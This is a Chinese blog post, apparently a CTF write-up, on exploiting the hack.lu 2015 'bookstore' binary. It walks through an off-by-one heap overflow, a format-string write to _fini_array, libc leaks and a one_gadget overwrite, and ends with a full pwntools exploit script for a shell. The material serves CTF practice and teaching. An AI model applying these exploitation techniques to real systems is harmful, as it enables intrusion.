off-by-one-bookstore

最新推荐文章于 2023-04-06 19:57:08 发布
原创 最新推荐文章于 2023-04-06 19:57:08 发布 · 2.5k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#pwn

本文针对HackLU2015书店程序的漏洞进行了深入分析,通过堆溢出和格式化字符串漏洞,实现了任意地址写入,进而利用one_gadget技巧获取shell权限。文章详细介绍了利用过程及关键步骤。

题目 : hacklu2015_bookstore

保护

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-TeMDe5HB-1642936683042)(off-by-one(bookstore)].assets/image-20220123172539218.png)

分析

题目嵌入函数层级不多

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-NVeN3G3h-1642936683044)(off-by-one(bookstore)].assets/image-20220123172858380.png)

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-eAxHPB7P-1642936683045)(off-by-one(bookstore)].assets/image-20220123173126461.png)

该程序和平时的堆体不太一样,漏洞很明显,没有提交malloc的选项,但是选项5有个malloc(0x140)那么因为存在堆溢出漏洞,所以通过溢出ptr1到ptr2的头部进行修改为0x150再释放ptr2进行提交时因为uaf的原因即可重新分配到ptr2+dest的堆块内容信息

#------------start----------------
dele(2)
payload = b'A'*0x88
edit(1,payload + p64(0x151))

溢出修改chunk2前:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-gaNwG3Eg-1642936683045)(off-by-one(bookstore)].assets/image-20220123174202758.png)

修改后:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-TVp1xe69-1642936683046)(off-by-one(bookstore)].assets/image-20220123174234589.png)

利用格式化字符漏洞进行任意地址写入,从而达到程序重新执行,那么就需要构造格式化字符的数据放入dest中,从mager函数中的值最后提交的数据会将ptr1和ptr2的数据按序放入sub_ptr中,因为经过上面的溢出,此时ptr2的大小为0x150,且sub_ptr的也是这块0x150的chunk,这里有点小绕,不过gdb调试观察一下就明白了

那么修改填入chunk1的数据如下:

def sub(addr):
    sla('5: Submit\n',b'5'*8 + addr) #乘以8是为了字节对其,以便后面写入数据
target = 0x6011B8 #_fini_array地址
start = 0x400780 #start函数地址
#------------start----------------
dele(2)
payload = b'%' + bytes(str(start & 0xffff),'utf-8') + b'c%13$hn' #写入地址使程序重新执行
payload += b'%31$p%33$p'  #同时泄露后续需要的重要函数,和libc
payload += b'A'* (0x88 -len(payload))  #填充剩下的数据.使之大小为0x90
edit(1,payload + p64(0x151))
sub(p64(target)) #将目标地址写入进栈空间

得到libc

#------------leak stack----------------
ru('0x')
libc = int(rc(12),16) - (0x7f3324caa830-0x7f3324c8a000)
ru('0x')
leak = int(rc(12),16)
success('leak',leak) 
success('libc',libc)

此时栈空间:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Ij2iaWR3-1642936683046)(off-by-one(bookstore)].assets/image-20220123183921964.png)

控制台打印的信息:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-xQgVbktO-1642936683047)(off-by-one(bookstore)].assets/image-20220123183959962.png)

因为有了libc的地址且程序重新执行了,最后就只需要再次通过格式化字符漏洞将one_gadget写入程序main函数返回地址(原__libc_start_main处),即可getshell

#------------getshell----------------
one_gadget = libc_base + one[0]
one1 = u16(p64(one_gadget)[:2])-22  #最后2字节 +偏移
one2 = u8(p64(one_gadget)[2:3]) -6 #最后第3字节+偏移
dele(2)
payload = b'%' + bytes(str(one1),'utf-8') + b'c%13$hn' #写入地址one_gadget
payload += b'%' + bytes(str(one2),'utf-8') + b'c%14$hhn' #写入地址one_gadget
payload += b'A'* (0x88 -len(payload))
edit(1,payload + p64(0x151)) #填充剩下的数据.使之大小为0x90
ret = leak - (0x7fffb51af3c8-0x7fffb51af110) #第二次进入main函数时的返回地址,这里是固定偏移,可以通过gdb调试出来
success('one',one_gadget)
sub(p64(ret)+p64(ret+2))

最后的栈空间

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ZNJ1xf2L-1642936683048)(off-by-one(bookstore)].assets/image-20220123191310331.png)

完整exp:

#! /usr/bin/python3
# -*-coding:utf-8 -*
from pwn import *
import sys

context.log_level = 'debug'
context.arch = 'amd64'
SigreturnFrame(kernel = 'amd64')

binary = "./bookstore"

global p
local = 1
if local:
    p = process(binary)
    e = ELF(binary)
    libc = e.libc
else:
    p = remote("111.200.241.244","58782")
    e = ELF(binary)
    libc = e.libc
    #libc = ELF('./libc_32.so.6')

sd = lambda s:p.send(s)
sl = lambda s:p.sendline(s)
rc = lambda s:p.recv(s)
ru = lambda s:p.recvuntil(s)
sa = lambda a,s:p.sendafter(a,s)
sla = lambda a,s:p.sendlineafter(a,s)
uu32 = lambda data :u32(data.ljust(4, b'\0'))
uu64 = lambda data :u64(data.ljust(8, b'\0'))
u64Leakbase = lambda offset :u64(ru("\x7f")[-6: ] + b'\0\0') - offset
u32Leakbase = lambda offset :u32(ru("\xf7")[-4: ]) - offset
it = lambda :p.interactive()


def z(s='b main'):
 gdb.attach(p,s)

def success(string,addr):
    print('\033[1;31;40m%20s-->0x%x\033[0m'%(string,addr))

def pa(s='暂停!'):
  log.success('当前执行步骤 -> '+str(s))
  pause()
one = [0x45206,0x4525a,0xcc673,0xcc748,0xefa00,0xf0897,0xf5e40,0xef9f4] #2.23
#one = [0x45226,0x4527a,0xcd173,0xcd248,0xf03a4,0xf03b0,0xf1247,0xf67f0]
#idx = int(sys.argv[1])

def sub(addr):
    sla('5: Submit\n',b'5'*8 + addr) #乘以8是为了字节对其,以便后面写入数据
def dele(idx):
    sla('5: Submit\n',str(idx+2))

def edit(idx,data):
    sla('5: Submit\n',str(idx))
    if idx==1:
       sla('Enter first order:\n',data)
    else:
       sla('Enter second order:\n',data)

target = 0x6011B8
start = 0x400780
z(''' b *0x400C8E  \n c''')
#------------start----------------
dele(2)
payload = b'%' + bytes(str(start & 0xffff),'utf-8') + b'c%13$hn' #写入地址使程序重新执行
payload += b'%31$p%33$p'  #同时泄露后续需要的重要函数,和libc
payload += b'A'* (0x88 -len(payload))
edit(1,payload + p64(0x151)) #填充剩下的数据.使之大小为0x90
sub(p64(target))
#------------leak stack----------------
ru('0x')
libc_base = int(rc(12),16) - (0x7f3324caa830-0x7f3324c8a000)#固定偏移
ru('0x')
leak = int(rc(12),16)
success('leak',leak)
success('libc',libc_base)
#------------getshell----------------
one_gadget = libc_base + one[0]
one1 = u16(p64(one_gadget)[:2])-22  #最后2字节 +偏移
one2 = u8(p64(one_gadget)[2:3]) -6 #最后第3字节+偏移
dele(2)
payload = b'%' + bytes(str(one1),'utf-8') + b'c%13$hn' #写入地址one_gadget
payload += b'%' + bytes(str(one2),'utf-8') + b'c%14$hhn' #写入地址one_gadget
payload += b'A'* (0x88 -len(payload))
edit(1,payload + p64(0x151)) #填充剩下的数据.使之大小为0x90
ret = leak - (0x7fffb51af3c8-0x7fffb51af110) #第二次进入main函数时的返回地址
success('one',one_gadget)
sub(p64(ret)+p64(ret+2))
#------------end----------------
it()
2015-hacklu-bookstore
【xiaoxiaorenwu's blog】
04-07 1220
首先提供题目的二进制文件:2015_hacklu 预览: 程序为64位,然后没有relro,没有pie,给调试带来很大方便。放进ida看看基本功能: 可以看到程序开始的时候已经在堆申请了三个堆块,且大小固定为0x80。 这里感觉怪怪的,s可以输入0x80个字符。。。。应该会有用处。 可以看到程序最后有一个格式化字符串漏洞,我们通过经验得知,通过精心构造格式化字符串可以实现任意地址读写功能。...
记一下 hack.lu 2015 bookstore 的思路,怕忘
哒君的博客
07-21 633
网络上两篇非常优秀的大佬的详细过程 https://blog.youkuaiyun.com/qq_43449190/article/details/89077783 https://bbs.pediy.com/thread-246783.htm
2015_hacklu_bookstore
a2590035252的博客
08-15 987
适用于广大和我一样的菜鸡pwner
劫持 64 位静态程序 fini_array 进行 ROP 攻击
SkYe's Blog
09-13 962
[scode type=“lblue”]2020年8月6日 标题添加“静态程序”,补充与 64 位动态程序对比和利用方法差异小结[/scode] 程序起点 程序的启动流程如图所示: 可以看到 main 函数不是程序起点,之前写的 格式化字符串盲打 也分析过 text 段起点是 _start 函数 。_start 函数调用__libc_start_main 完成启动和退出工作。具体看看 _start 函数: .text:0000000000401A60 public star
一个比较原始的实现bookstore的JSP
一路同行,风雨兼程--spotmausoft的专栏
06-02 905
初学jsp编程,里面有很多东西不知道啊,现在就遇到了一个问题,其实这个程序是我 在一本书上看到了,不知道里面有什么错误,网上的哪为高手能不吝赐教一下,将不胜感激!我的程序都在附件里面!先谢谢个为了,有了结果别忘了给我的QQ留言或者给我在blog上留下您的大名和改正程序的方法哦!http://download1.youkuaiyun.com/down3/20070602/02235609164.rar
【堆漏洞-Off_by_one
m0_52343643的博客
04-06 1555
缓冲区溢出的一种,只能溢出一个字节普通 off_by_one ,修改堆上指针通过溢出修改堆块头,制造堆块重叠,达到泄露与改写目的-(1) 扩展被释放堆块-(2) 扩展已分配堆块-(3) 收缩被释放堆块-常见的漏洞场景1、 for循环多接收了一个字符2、 strcpy与strlen的行为不一致,strlen不计算入‘ \x00 ’,strcpy会把‘ \x00 ’一同复制3、判断字符串结束符为‘ \n ’,而不是‘ \x00 ’版本问题。
VGG-16图像识别
weixin_43765314的博客
02-15 9122
VGG net VGG net是 Karen simonyan 等人在2015年的CLR会议中公开的神经网络模型。这个模型在2014年的Imagenet比赛中获得了定位第一名和分类第二名的好成绩,它的主要贡献在于利用3×3小卷积核的网络结构对逐渐加深的网络进行评估,结果表明加深网络深度到16至19层可极大提高模型精度。 架构: 训练输入:固定尺寸224×224的RGB图像 预处理:每个像素...
新概念英语Ⅲ笔记 - L1-L3
kdxmk的博客
01-04 1337
新概念英语Ⅲ笔记 - L1-L3
Django学习之路-基础篇
togph的博客
08-05 1205
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 Django 学习之路一、Django项目创建1.项目结构1.1 项目结构详解1.1.1 settings.py 文件二、使用步骤1.引入库2.读入数据总结 一、Django项目创建 1.项目结构 1.1 项目结构详解 1.1.1 settings.py 文件 """ Django settings for mydemo project. Generated by 'django-admin startproject' using D
TensorFlow-Keras预训练模型测试
热门推荐
信道者
07-06 1万+
在tf.keras.applications里有多个预训练的模型类。这些类继承了tf.keras.Model类,使用比较方便。在实例化这些类之后,程序会自动下载参数,存储于本地硬盘。本文测试了这些预训练模型,并发现测试结果普遍差于论文声称结果。
TensorFlow北大公开课学习笔记8-复现vgg16并实现图片识别
qq_37791134的博客
11-06 3851
https://www.cs.toronto.edu/~frossard/post/vgg16/ 】img_ready = re_img.reshape((1, 224, 224, 3)) ValueError: cannot reshape array of size 200704 into shape (1,224,224,3)因为图片是四通道的,为啥?224*334*4=200704 ...
bookstore静态页面
eileen823的博客
02-21 1147
bookstore静态页面代码如下: #right{ float: right; vertical-align: middle; line-height:50px; margin-right:70px; } #right img{ margin-top:11px; } #right a{
Chunk Extend/Overlapping | 堆拓展、重叠
SkYe's Blog
08-06 2356
堆拓展&溢出 绝大部分内容来自 CTF-WIKI ,内容引用用于学习记录 介绍 chunk extend 是堆漏洞的一种常见利用手法,通过 extend 可以实现 chunk overlapping 的效果。这种利用方法需要以下的时机和条件: 程序中存在基于堆的漏洞 漏洞可以控制 chunk header 中的数据 原理 chunk extend 技术能够产生的原因在于 ptmalloc 在对堆 chunk 进行操作时使用的各种宏。 在 ptmalloc 中,获取 chunk 块大小的操作如
TSIA 022.1—2021 工业互联网标识解析顶级节点服务能力成熟度第1部分:模型.pdf
11-27
TSIA 022.1—2021 工业互联网标识解析顶级节点服务能力成熟度第1部分:模型
【事件触发一致性】研究多智能体网络如何通过分布式事件驱动控制实现有限时间内的共识(Matlab代码实现)
11-27
【事件触发一致性】研究多智能体网络如何通过分布式事件驱动控制实现有限时间内的共识(Matlab代码实现)内容概要:本文档围绕多智能体网络中的事件触发一致性控制展开,重点研究如何通过分布式事件驱动控制策略实现多智能体系统在有限时间内达成共识,并提供了基于Matlab的代码实现。文档还涵盖了无人机路径规划、多目标跟踪、图像处理、故障诊断、优化算法等多个科研方向的技术实现与仿真案例,展示了事件触发机制在多智能体协同控制中的高效性与节能优势。核心技术包括分布式控制算法设计、事件触发条件设定、系统收敛性分析及仿真验证。; 适合人群:具备一定自动化、控制理论或计算机背景的研究生、科研人员及从事智能系统开发的工程师,熟悉Matlab编程与基本控制系统建模者更佳。; 使用场景及目标:①研究多智能体系统在资源受限条件下的协同控制问题;②掌握事件触发机制相较于传统周期采样控制的优势;③实现多无人机、机器人等系统的高效协同与节能通信;④为分布式控制算法的仿真与验证提供可复用的代码框架。; 阅读建议:建议结合Matlab代码逐模块理解算法实现流程,重点关注事件触发条件的设计逻辑与系统稳定性证明部分,可进一步拓展至其他分布式优化与协同控制应用场景。
【四轴飞行器】非线性三自由度四轴飞行器模拟器研究(Matlab代码实现)
最新发布
11-27
【四轴飞行器】非线性三自由度四轴飞行器模拟器研究(Matlab代码实现)内容概要:本文围绕非线性三自由度四轴飞行器模拟器的研究展开,重点介绍了基于Matlab的建模与仿真方法。通过对四轴飞行器的动力学特性进行分析,构建了非线性状态空间模型,并实现了姿态与位置的动态模拟。研究涵盖了飞行器运动方程的建立、控制系统设计及数值仿真验证等环节,突出非线性系统的精确建模与仿真优势,有助于深入理解飞行器在复杂工况下的行为特征。此外,文中还提到了多种配套技术如PID控制、状态估计与路径规划等,展示了Matlab在航空航天仿真中的综合应用能力。; 适合人群:具备一定自动控制理论基础和Matlab编程能力的高校学生、科研人员及从事无人机系统开发的工程技术人员,尤其适合研究生及以上层次的研究者。; 使用场景及目标:①用于四轴飞行器控制系统的设计与验证,支持算法快速原型开发;②作为教学工具帮助理解非线性动力学系统建模与仿真过程;③支撑科研项目中对飞行器姿态控制、轨迹跟踪等问题的深入研究; 阅读建议:建议读者结合文中提供的Matlab代码进行实践操作,重点关注动力学建模与控制模块的实现细节,同时可延伸学习文档中提及的PID控制、状态估计等相关技术内容,以全面提升系统仿真与分析能力。
沱江.zip
11-27
三级水系流域矢量数据,数据格式shp格式,坐标系wgs84,真实可靠可打开,放心使用
nuscene-infos-vals
11-27
nuscene-infos-vals
基于SpringBoot+Mybatis框架的私人影院预约系统.zip
11-27
基于SpringBoot+Mybatis框架的私人影院预约系统.zip
primer-bookstore项目源码解析与应用
从“项目结构”角度来看,该压缩包中包含名为“primer-bookstore-main”的子文件夹,这通常是克隆自 GitHub 的主分支默认目录结构。标准的前端项目结构一般包括:`index.html` 作为入口页面;`css/` 目录存放样式表...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值